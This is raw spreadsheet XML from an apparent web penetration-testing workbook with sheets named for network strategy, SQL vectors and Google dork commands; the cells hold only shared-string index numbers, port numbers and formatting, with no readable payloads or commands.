  <pageSetup firstPageNumber="0" orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId10"/>
  <headerFooter alignWithMargins="0"/>
  <legacy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89F13-CE3A-CF4D-9AAF-6C41ADBEE78F}">
  <dimension ref="A1:F24"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C11" sqref="C11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.44140625" defaultRowHeight="13.2"/>
  <cols>
    <col min="1" max="1" width="18.6640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="11.6640625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="49.6640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="19.33203125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="55.6640625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="129.44140625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="15.6">
      <c r="A1" s="53" t="s">
        <v>334</v>
      </c>
      <c r="B1" s="53" t="s">
        <v>335</v>
      </c>
      <c r="C1" s="53" t="s">
        <v>336</v>
      </c>
      <c r="D1" s="53" t="s">
        <v>337</v>
      </c>
      <c r="E1" s="53" t="s">
        <v>338</v>
      </c>
      <c r="F1" s="53" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="2" spans="1:6">
      <c r="A2" s="90" t="s">
        <v>340</v>
      </c>
      <c r="B2" s="91">
        <v>53</v>
      </c>
      <c r="C2" s="54" t="s">
        <v>341</v>
      </c>
      <c r="D2" s="55" t="s">
        <v>342</v>
      </c>
      <c r="E2" s="56" t="s">
        <v>343</v>
      </c>
      <c r="F2" s="56" t="s">
        <v>344</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="39.6">
      <c r="A3" s="90"/>
      <c r="B3" s="91"/>
      <c r="C3" s="55" t="s">
        <v>345</v>
      </c>
      <c r="D3" s="54" t="s">
        <v>346</v>
      </c>
      <c r="E3" s="54" t="s">
        <v>347</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>348</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="39.6">
      <c r="A4" s="90"/>
      <c r="B4" s="91"/>
      <c r="C4" t="s">
        <v>349</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>350</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>351</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="66">
      <c r="A5" s="90" t="s">
        <v>352</v>
      </c>
      <c r="B5" s="91">
        <v>80</v>
      </c>
      <c r="C5" t="s">
        <v>353</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>354</v>
      </c>
      <c r="E5" s="22" t="s">
        <v>355</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="39.6">
      <c r="A6" s="90"/>
      <c r="B6" s="91"/>
      <c r="C6" t="s">
        <v>356</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>357</v>
      </c>
      <c r="E6" s="22" t="s">
        <v>358</v>
      </c>
    </row>
    <row r="7" spans="1:6">
      <c r="A7" s="90"/>
      <c r="B7" s="91"/>
      <c r="C7" t="s">
        <v>359</v>
      </c>
      <c r="D7" t="s">
        <v>360</v>
      </c>
      <c r="E7" s="57" t="s">
        <v>361</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="39.6">
      <c r="A8" s="90"/>
      <c r="B8" s="91"/>
      <c r="C8" t="s">
        <v>362</v>
      </c>
      <c r="D8" t="s">
        <v>363</v>
      </c>
      <c r="E8" s="22" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="26.4">
      <c r="A9" s="90"/>
      <c r="B9" s="91"/>
      <c r="C9" t="s">
        <v>365</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>366</v>
      </c>
      <c r="E9" s="22" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="10" spans="1:6">
      <c r="A10" s="90"/>
      <c r="B10" s="91"/>
      <c r="C10" t="s">
        <v>368</v>
      </c>
      <c r="D10" t="s">
        <v>369</v>
      </c>
      <c r="E10" s="57" t="s">
        <v>370</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="118.8">
      <c r="A11" s="90"/>
      <c r="B11" s="91"/>
      <c r="C11" t="s">
        <v>371</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>372</v>
      </c>
      <c r="E11" s="22" t="s">
        <v>373</v>
      </c>
      <c r="F11" t="s">
        <v>374</v>
      </c>
    </row>
    <row r="12" spans="1:6">
      <c r="A12" s="90"/>
      <c r="B12" s="91"/>
      <c r="C12" t="s">
        <v>375</v>
      </c>
      <c r="D12" t="s">
        <v>376</v>
      </c>
      <c r="E12" s="57" t="s">
        <v>377</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="66">
      <c r="A13" s="90" t="s">
        <v>378</v>
      </c>
      <c r="B13" s="91">
        <v>443</v>
      </c>
      <c r="C13" t="s">
        <v>379</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>380</v>
      </c>
      <c r="E13" s="56" t="s">
        <v>381</v>
      </c>
      <c r="F13" t="s">
        <v>382</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="26.4">
      <c r="A14" s="90"/>
      <c r="B14" s="91"/>
      <c r="C14" t="s">
        <v>383</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>350</v>
      </c>
      <c r="E14" s="1" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="26.4">
      <c r="A15" s="90"/>
      <c r="B15" s="91"/>
      <c r="C15" t="s">
        <v>356</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>385</v>
      </c>
      <c r="E15" s="22" t="s">
        <v>386</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="26.4">
      <c r="A16" s="90"/>
      <c r="B16" s="91"/>
      <c r="C16" t="s">
        <v>365</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>366</v>
      </c>
      <c r="E16" s="22" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="118.8">
      <c r="A17" s="90"/>
      <c r="B17" s="91"/>
      <c r="C17" t="s">
        <v>371</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>372</v>
      </c>
      <c r="E17" s="22" t="s">
        <v>373</v>
      </c>
      <c r="F17" t="s">
        <v>388</v>
      </c>
    </row>
    <row r="18" spans="1:6">
      <c r="A18" s="90"/>
      <c r="B18" s="91"/>
      <c r="C18" t="s">
        <v>375</v>
      </c>
      <c r="D18" t="s">
        <v>376</v>
      </c>
      <c r="E18" s="57" t="s">
        <v>377</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="26.4">
      <c r="A19" s="90"/>
      <c r="B19" s="91"/>
      <c r="C19" t="s">
        <v>389</v>
      </c>
      <c r="D19" s="22" t="s">
        <v>366</v>
      </c>
      <c r="E19" s="1" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="20" spans="1:6">
      <c r="A20" s="90"/>
      <c r="B20" s="91"/>
      <c r="C20" t="s">
        <v>359</v>
      </c>
      <c r="D20" t="s">
        <v>360</v>
      </c>
      <c r="E20" s="57" t="s">
        <v>391</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="14.4">
      <c r="A21" s="90"/>
      <c r="B21" s="91"/>
      <c r="C21" t="s">
        <v>392</v>
      </c>
      <c r="D21" t="s">
        <v>393</v>
      </c>
      <c r="E21" s="57" t="s">
        <v>394</v>
      </c>
      <c r="F21" t="s">
        <v>395</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="40.200000000000003">
      <c r="A22" s="90"/>
      <c r="B22" s="91"/>
      <c r="C22" t="s">
        <v>396</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>397</v>
      </c>
      <c r="E22" s="1" t="s">
        <v>398</v>
      </c>
      <c r="F22" t="s">
        <v>399</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="26.4">
      <c r="A23" s="90"/>
      <c r="B23" s="91"/>
      <c r="C23" s="89" t="s">
        <v>400</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>401</v>
      </c>
      <c r="E23" s="22" t="s">
        <v>402</v>
      </c>
      <c r="F23" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="24" spans="1:6">
      <c r="A24" s="89"/>
      <c r="B24" s="89"/>
      <c r="C24" s="89"/>
      <c r="D24" t="s">
        <v>404</v>
      </c>
      <c r="E24" s="57" t="s">
        <v>405</v>
      </c>
      <c r="F24" t="s">
        <v>406</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="C23:C24"/>
    <mergeCell ref="A2:A4"/>
    <mergeCell ref="B2:B4"/>
    <mergeCell ref="A5:A12"/>
    <mergeCell ref="B5:B12"/>
    <mergeCell ref="A13:A24"/>
    <mergeCell ref="B13:B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6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A17" sqref="A17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.6640625" defaultRowHeight="13.2"/>
  <cols>
    <col min="1" max="1" width="46.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1">
      <c r="A1" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="2" spans="1:1">
      <c r="A2" t="s">
        <v>408</v>
      </c>
    </row>
    <row r="3" spans="1:1">
      <c r="A3" t="s">
        <v>409</v>
      </c>
    </row>
    <row r="4" spans="1:1">
      <c r="A4" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="5" spans="1:1">
      <c r="A5" t="s">
        <v>411</v>
      </c>
    </row>
    <row r="6" spans="1:1">
      <c r="A6" t="s">
        <v>412</v>
      </c>
    </row>
    <row r="7" spans="1:1">
      <c r="A7" t="s">
        <v>413</v>
      </c>
    </row>
    <row r="8" spans="1:1">
      <c r="A8" t="s">
        <v>414</v>
      </c>
    </row>
    <row r="9" spans="1:1">
      <c r="A9" t="s">
        <v>415</v>
      </c>
    </row>
    <row r="10" spans="1:1">
      <c r="A10" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="11" spans="1:1">
      <c r="A11" t="s">
        <v>417</v>
      </c>
    </row>
    <row r="12" spans="1:1">
      <c r="A12" t="s">
        <v>418</v>
      </c>
    </row>
    <row r="13" spans="1:1">
      <c r="A13" t="s">
        <v>419</v>
      </c>
    </row>
    <row r="14" spans="1:1">
      <c r="A14" t="s">
        <v>420</v>
      </c>
    </row>
    <row r="15" spans="1:1">
      <c r="A15" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="16" spans="1:1">
      <c r="A16" t="s">
        <v>422</v>
      </c>
    </row>
    <row r="17" spans="1:1">
      <c r="A17" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="18" spans="1:1">
      <c r="A18" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="19" spans="1:1">
      <c r="A19" t="s">
        <v>425</v>
      </c>
    </row>
    <row r="20" spans="1:1">
      <c r="A20" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="21" spans="1:1">
      <c r="A21" t="s">
        <v>427</v>
      </c>
    </row>
    <row r="22" spans="1:1">
      <c r="A22" t="s">
        <v>428</v>
      </c>
    </row>
    <row r="23" spans="1:1">
      <c r="A23" t="s">
        <v>429</v>
      </c>
    </row>
    <row r="24" spans="1:1">
      <c r="A24" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="25" spans="1:1">
      <c r="A25" t="s">
        <v>431</v>
      </c>
    </row>
    <row r="26" spans="1:1">
      <c r="A26" t="s">
        <v>432</v>
      </c>
    </row>
    <row r="27" spans="1:1">
      <c r="A27" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="28" spans="1:1">
      <c r="A28" t="s">
        <v>434</v>
      </c>
    </row>
    <row r="29" spans="1:1">
      <c r="A29" t="s">
        <v>435</v>
      </c>
    </row>
    <row r="30" spans="1:1">
      <c r="A30" t="s">
        <v>436</v>
      </c>
    </row>
    <row r="31" spans="1:1">
      <c r="A31" t="s">
        <v>437</v>
      </c>
    </row>
    <row r="32" spans="1:1">
      <c r="A32" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="33" spans="1:1">
      <c r="A33" t="s">
        <v>439</v>
      </c>
    </row>
    <row r="34" spans="1:1">
      <c r="A34" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="35" spans="1:1">
      <c r="A35" t="s">
        <v>441</v>
      </c>
    </row>
    <row r="36" spans="1:1">
      <c r="A36" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="37" spans="1:1">
      <c r="A37" t="s">
        <v>443</v>
      </c>
    </row>
    <row r="38" spans="1:1">
      <c r="A38" t="s">
        <v>444</v>
      </c>
    </row>
    <row r="39" spans="1:1">
      <c r="A39" t="s">
        <v>445</v>
      </c>
    </row>
    <row r="40" spans="1:1">
      <c r="A40" t="s">
        <v>446</v>
      </c>
    </row>
    <row r="41" spans="1:1">
      <c r="A41" t="s">
        <v>447</v>
      </c>
    </row>
    <row r="42" spans="1:1">
      <c r="A42" t="s">
        <v>448</v>
      </c>
    </row>
    <row r="43" spans="1:1">
      <c r="A43" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="44" spans="1:1">
      <c r="A44" t="s">
        <v>450</v>
      </c>
    </row>
    <row r="45" spans="1:1">
      <c r="A45" t="s">
        <v>451</v>
      </c>
    </row>
    <row r="46" spans="1:1">
      <c r="A46" t="s">
        <v>452</v>
      </c>
    </row>
    <row r="47" spans="1:1">
      <c r="A47" t="s">
        <v>453</v>
      </c>
    </row>
    <row r="48" spans="1:1">
      <c r="A48" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="49" spans="1:1">
      <c r="A49" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="50" spans="1:1">
      <c r="A50" t="s">
        <v>456</v>
      </c>
    </row>
    <row r="51" spans="1:1">
      <c r="A51" t="s">
        <v>457</v>
      </c>
    </row>
    <row r="52" spans="1:1">
      <c r="A52" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="53" spans="1:1">
      <c r="A53" t="s">
        <v>459</v>
      </c>
    </row>
    <row r="54" spans="1:1">
      <c r="A54" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="55" spans="1:1">
      <c r="A55" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="56" spans="1:1">
      <c r="A56" t="s">
        <v>462</v>
      </c>
    </row>
    <row r="57" spans="1:1">
      <c r="A57" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="58" spans="1:1">
      <c r="A58" t="s">
        <v>463</v>
      </c>
    </row>
    <row r="59" spans="1:1">
      <c r="A59" t="s">
        <v>434</v>
      </c>
    </row>
    <row r="60" spans="1:1">
      <c r="A60" t="s">
        <v>464</v>
      </c>
    </row>
    <row r="61" spans="1:1">
      <c r="A61" t="s">
        <v>465</v>
      </c>
    </row>
    <row r="62" spans="1:1">
      <c r="A62" t="s">
        <v>466</v>
      </c>
    </row>
    <row r="63" spans="1:1">
      <c r="A63" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="64" spans="1:1">
      <c r="A64" t="s">
        <v>468</v>
      </c>
    </row>
    <row r="65" spans="1:1">
      <c r="A65" t="s">
        <v>469</v>
      </c>
    </row>
    <row r="66" spans="1:1">
      <c r="A66" t="s">
        <v>470</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection selectLockedCells="1" selectUnlockedCells="1"/>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5B657-44A1-7F40-89B4-1FC1A48144BA}">
  <dimension ref="A1:C26"/>
  <sheetViews>
    <sheetView topLeftCell="A10" workbookViewId="0">
      <selection activeCell="B6" sqref="B6:B7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.44140625" defaultRowHeight="13.2"/>
  <cols>
    <col min="2" max="2" width="113.6640625" customWidth="1"/>
    <col min="3" max="3" width="87.44140625" style="1" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="17.399999999999999">
      <c r="A1" s="61" t="s">
        <v>471</v>
      </c>
      <c r="B1" s="61" t="s">
        <v>472</v>
      </c>
      <c r="C1" s="62" t="s">
        <v>473</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="15">
      <c r="A2" s="63">
        <v>1</v>
      </c>
      <c r="B2" s="64" t="s">
        <v>474</v>
      </c>
      <c r="C2" s="65" t="s">
        <v>475</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="30">
      <c r="A3" s="63">
        <v>2</v>
      </c>
      <c r="B3" s="64" t="s">
        <v>476</v>
      </c>
      <c r="C3" s="65" t="s">
        <v>477</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="17.55" customHeight="1">
      <c r="A4" s="93">
        <v>3</v>
      </c>
      <c r="B4" s="92" t="s">
        <v>478</v>
      </c>
      <c r="C4" s="65" t="s">
        <v>479</v>
      </c>
    </row>
    <row r="5" spans="1:3" ht="17.55" customHeight="1">
      <c r="A5" s="93"/>
      <c r="B5" s="92"/>
      <c r="C5" s="65" t="s">
        <v>480</v>
      </c>
    </row>
    <row r="6" spans="1:3" ht="17.55" customHeight="1">
      <c r="A6" s="93">
        <v>4</v>
      </c>
      <c r="B6" s="92" t="s">
        <v>481</v>
      </c>
      <c r="C6" s="65" t="s">
        <v>482</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="30">
      <c r="A7" s="93"/>
      <c r="B7" s="92"/>
      <c r="C7" s="65" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="15">
      <c r="A8" s="63">
        <v>5</v>
      </c>
      <c r="B8" s="64" t="s">
        <v>484</v>
      </c>
      <c r="C8" s="65" t="s">
        <v>485</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="15">
      <c r="A9" s="63">
        <v>6</v>
      </c>
      <c r="B9" s="64" t="s">
        <v>486</v>
      </c>
      <c r="C9" s="65" t="s">
        <v>487</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="48.45" customHeight="1">
      <c r="A10" s="93">
        <v>7</v>
      </c>
      <c r="B10" s="92" t="s">
        <v>488</v>
      </c>
      <c r="C10" s="65" t="s">
        <v>489</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="15">
      <c r="A11" s="93"/>
      <c r="B11" s="92"/>
      <c r="C11" s="65" t="s">
        <v>490</v>
      </c>
    </row>
    <row r="12" spans="1:3" ht="30">
      <c r="A12" s="63">
        <v>8</v>
      </c>
      <c r="B12" s="63" t="s">
        <v>491</v>
      </c>
      <c r="C12" s="65" t="s">
        <v>492</v>
      </c>
    </row>
    <row r="13" spans="1:3" ht="15">
      <c r="A13" s="63">
        <v>9</v>
      </c>
      <c r="B13" s="64" t="s">
        <v>493</v>
      </c>
      <c r="C13" s="65" t="s">
        <v>494</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="15">
      <c r="A14" s="63">
        <v>10</v>
      </c>
      <c r="B14" s="64" t="s">
        <v>495</v>
      </c>
      <c r="C14" s="65" t="s">
        <v>496</v>
      </c>
    </row>
    <row r="15" spans="1:3" ht="15">
      <c r="A15" s="63">
        <v>11</v>
      </c>
      <c r="B15" s="64" t="s">
        <v>497</v>
      </c>
      <c r="C15" s="65" t="s">
        <v>498</v>
      </c>
    </row>
    <row r="16" spans="1:3" ht="15">
      <c r="A16" s="63">
        <v>12</v>
      </c>
      <c r="B16" s="64" t="s">
        <v>499</v>
      </c>
      <c r="C16" s="65" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="30">
      <c r="A17" s="63">
        <v>13</v>
      </c>
      <c r="B17" s="68" t="s">
        <v>501</v>
      </c>
      <c r="C17" s="65" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="18" spans="1:3" ht="15">
      <c r="A18" s="93">
        <v>14</v>
      </c>
      <c r="B18" s="92" t="s">
        <v>503</v>
      </c>
      <c r="C18" s="64" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="19" spans="1:3" ht="15">
      <c r="A19" s="93"/>
      <c r="B19" s="92"/>
      <c r="C19" s="64" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="15">
      <c r="A20" s="93"/>
      <c r="B20" s="92"/>
      <c r="C20" s="64" t="s">
        <v>506</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="15">
      <c r="A21" s="93"/>
      <c r="B21" s="92"/>
      <c r="C21" s="64" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="15">
      <c r="A22" s="93"/>
      <c r="B22" s="92"/>
      <c r="C22" s="64" t="s">
        <v>508</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="17.399999999999999">
      <c r="B23" s="60"/>
    </row>
    <row r="24" spans="1:3" ht="17.399999999999999">
      <c r="B24" s="60"/>
    </row>
    <row r="25" spans="1:3" ht="17.399999999999999">
      <c r="B25" s="60"/>
    </row>
    <row r="26" spans="1:3" ht="17.399999999999999">
      <c r="B26" s="60"/>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="B18:B22"/>
    <mergeCell ref="A18:A22"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B6:B7"/>
    <mergeCell ref="A6:A7"/>
    <mergeCell ref="B10:B11"/>
    <mergeCell ref="A10:A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New Strategy</vt:lpstr>
      <vt:lpstr>Network_strategy_for_web</vt:lpstr>
      <vt:lpstr>SQL-vectors</vt:lpstr>
      <vt:lpstr>Google Dork - commands</vt:lpstr>
      <vt:lpstr>__Anonymous_Sheet_DB__1_1</vt:lpstr>
      <vt:lpstr>'New Strategy'!Excel_BuiltIn__FilterDatabase</vt:lpstr>
      <vt:lpstr>Excel_BuiltIn__FilterDatabase_1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divyesh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>gadeela charani</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-07T09:42:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-07T02:24:54Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>